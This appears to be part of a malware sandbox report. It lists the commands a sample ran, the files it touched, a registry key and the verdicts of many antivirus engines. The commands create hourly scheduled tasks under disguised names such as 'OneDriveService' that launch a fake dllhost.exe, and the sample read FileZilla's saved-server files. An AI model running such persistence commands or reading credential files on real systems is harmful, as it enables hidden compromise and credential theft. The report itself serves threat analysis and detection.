cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
file | C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml |
file | C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml |
Cynet | Malicious (score: 100) |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
Cybereason | malicious.3b6a84 |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (high confidence) |
APEX | Malicious |
FireEye | Generic.mg.60f0517dccdde6f0 |
Rising | Malware.Obfus/MSIL@AI.86 (RDM.MSIL2:fyKXE+SwjGKsf+52yy/WEg) |
SentinelOne | Static AI - Suspicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
CrowdStrike | win/malicious_confidence_100% (D) |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |